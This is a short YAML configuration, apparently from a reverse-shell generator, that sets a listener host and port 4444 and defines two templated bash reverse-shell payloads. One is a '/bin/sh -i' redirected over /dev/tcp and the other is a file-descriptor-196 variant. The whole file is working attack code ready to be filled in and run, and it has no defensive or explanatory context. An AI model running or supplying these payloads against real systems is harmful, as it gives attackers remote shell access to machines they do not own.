reverse_shell_config:
  r_host: "192.168.1.100"  
  r_port: 4444
  
payload_template:
  - name: "Bash revshell"
    choice_c: "1"
    code: |
      /bin/sh -i >& /dev/tcp/{{r_host}}/{{r_port}} 0>&1
  - name: "Bash revshell 196"
    choice_c: "2"
    code: |
      0<&196;exec 196<>/dev/tcp/{{r_host}}/{{r_port}}; /bin/sh <&196 >&196 2>&196
  